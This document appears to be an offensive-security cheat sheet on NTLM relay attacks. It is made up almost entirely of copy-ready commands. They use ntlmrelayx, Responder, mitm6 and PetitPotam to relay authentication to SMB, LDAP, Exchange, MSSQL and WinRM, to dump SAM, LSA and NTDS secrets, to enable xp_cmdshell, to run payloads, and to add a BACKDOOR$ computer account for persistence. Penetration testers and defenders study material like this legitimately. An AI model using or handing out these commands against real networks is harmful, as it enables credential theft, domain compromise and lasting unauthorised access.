NTLM Relay Attacks
Understanding NTLM Relay
Core Concept
Purpose: Intercept NTLM authentication attempts and relay them to target systems without needing to crack password hashes.
Attack Flow:
Victim → Attacker (Relay Server) → Target SystemVictim initiates NTLM authentication to attacker
Attacker forwards authentication to legitimate target
Target grants access based on victim's credentials
Attacker gains access as the victim
Requirements:
Network position to intercept authentication
Target systems without SMB signing or other protections
Victim authentication attempts (natural or forced)
Attack Value: Immediate access to systems without password cracking, works with strong passwords
SMB Relay Attacks
Classic SMB to SMB Relay
Purpose: Relay SMB authentication between different SMB services for lateral movement.
Basic SMB Relay Setup
# Identify relay targets (systems without SMB signing)
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt
# Basic SMB relay to multiple targets
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support
# Relay with immediate command execution
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -c "whoami && ipconfig"
# Interactive shell via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -i
# Connect to interactive shell: nc 127.0.0.1 11000Advanced SMB Relay Operations
# Dump SAM database via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --sam
# Dump LSA secrets via relay
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --lsa
# Execute specific payload
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support -e ./payload.exe
# One-shot attack (exit after first successful relay)
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support --one-shotRequirements: SMB signing disabled on targets, network access
Attack Value: File system access, credential dumping, code execution
SMB Relay with Responder Integration
# Terminal 1: Responder in analysis mode (capture but don't respond)
sudo responder -I eth0 -A -v
# Terminal 2: NTLM relay server
python3 ntlmrelayx.py -tf targets.txt -smb2support
# Terminal 3: Force authentication (optional)
# Access non-existent share to trigger authentication
net use \\<attacker-ip>\fakeCross-Protocol Relay Attacks
SMB to LDAP Relay
Purpose: Relay SMB authentication to domain controllers for Active Directory privilege escalation.
LDAP Privilege Escalation
# Basic privilege escalation via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <low-priv-user>
# Add computer account via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer EVILCOMPUTER$ --computer-pass CompPass123!
# Delegate access permissions
python3 ntlmrelayx.py -t ldap://<DC-IP> --delegate-access --escalate-user <username>
# LDAP relay with DCSync attack setup
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <username> --dumpLDAPS (Secure LDAP) Relay
# Relay to LDAPS (encrypted LDAP)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username>
# LDAPS with certificate validation bypass
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username> --no-validate-privs
# Target specific LDAP operations
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer NEWPC$ --delegate-accessRequirements: Domain controller accessible, victim with domain privileges
Attack Value: Domain admin rights, DCSync capabilities, computer account creation
SMB to HTTP/HTTPS Relay
Purpose: Relay SMB authentication to web applications supporting NTLM authentication.
Web Application Relay
# Basic HTTP relay
python3 ntlmrelayx.py -t http://<web-server> -smb2support
# HTTPS relay with specific endpoints
python3 ntlmrelayx.py -t https://<web-server>/admin -smb2support
# Multiple HTTP targets
echo "http://web1.company.com" > http_targets.txt
echo "https://web2.company.com/api" >> http_targets.txt
python3 ntlmrelayx.py -tf http_targets.txt -smb2supportExchange Server Relay
# Relay to Exchange Web Services (EWS)
python3 ntlmrelayx.py -t https://<exchange-server>/EWS/Exchange.asmx -smb2support
# Relay to Outlook Web Access
python3 ntlmrelayx.py -t https://<exchange-server>/owa -smb2support
# Exchange PowerShell endpoint
python3 ntlmrelayx.py -t https://<exchange-server>/PowerShell -smb2supportRequirements: Web applications with NTLM authentication enabled
Attack Value: Web application access, email system compromise, API exploitation
Specialized Protocol Relay
MSSQL Relay Attacks
Purpose: Relay authentication to SQL Server instances for database access and code execution.
# Basic MSSQL relay
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support
# MSSQL relay with immediate query execution
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support -q "SELECT @@version"
# Enable xp_cmdshell via relay
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support --enable-xp-cmdshell
# MSSQL relay with command execution
python3 ntlmrelayx.py -t mssql://<sql-server> -smb2support -c "whoami"WinRM Relay Attacks
Purpose: Relay authentication to Windows Remote Management for PowerShell access.
# WinRM relay for remote PowerShell
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support
# WinRM with immediate command execution
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support -c "Get-Process"
# Interactive WinRM session
python3 ntlmrelayx.py -t winrm://<target-server> -smb2support -iRequirements: WinRM enabled with NTLM authentication
Attack Value: Remote PowerShell access, administrative control
Advanced Relay Techniques
IPv6 + NTLM Relay Combination
Purpose: Combine IPv6 attacks with NTLM relay for enhanced targeting and stealth.
mitm6 + ntlmrelayx Integration
# Terminal 1: IPv6 DHCPv6 attack
sudo mitm6 -d <domain.com> --ignore-nofqdn
# Terminal 2: NTLM relay with IPv6 support
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username> --delegate-access
# Terminal 3: Monitor for incoming connections
sudo netstat -tuln | grep :445Requirements: IPv6 enabled in target environment
Attack Value: More reliable targeting, DNS manipulation, stealth
Multi-Protocol Relay Chains
Purpose: Chain multiple relay operations across different protocols for complex attack paths.
# Multi-target relay with different protocols
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support
# Where mixed_targets.txt contains:
# smb://server1.domain.com
# http://webapp.domain.com
# ldap://dc.domain.com
# mssql://database.domain.com
# Chain with specific operations per protocol
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <user> \
-tf smb_targets.txt --sam --lsaWebDAV Relay Bypass
Purpose: Use WebDAV to bypass SMB signing restrictions.
# WebDAV relay setup
python3 ntlmrelayx.py -t http://<target-server>/webdav -smb2support
# Force WebDAV authentication
net use Z: \\<attacker-ip>\webdav /persistent:no
# WebDAV with file upload capability
python3 ntlmrelayx.py -t http://<target-server>/webdav -smb2support \
--upload-file payload.exe --upload-path /uploads/Relay Attack Workflow
Comprehensive Relay Assessment
# Phase 1: Target identification
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt
nmap -p 445 --script smb-security-mode <network-range>
# Phase 2: Multi-protocol relay setup
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support \
-t ldap://<DC-IP> --escalate-user <lowpriv-user>
# Phase 3: Authentication forcing (covered in next section)
python3 PetitPotam.py <attacker-ip> <high-value-target>
# Phase 4: Exploitation and data extraction
python3 ntlmrelayx.py -tf targets.txt -smb2support --sam --lsa --ntds
# Phase 5: Persistence establishment
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer BACKDOOR$ \
--delegate-access --escalate-user <compromised-user>Attack Success Indicators
SMB Relay: Administrative access to file shares, SAM/LSA dumps
LDAP Relay: Domain privilege escalation, DCSync rights acquisition
HTTP Relay: Web application access, session hijacking
Cross-Protocol: Multi-service access, complex privilege chains
IPv6 Integration: DNS manipulation, enhanced stealth capabilities
Last updated
Was this helpful?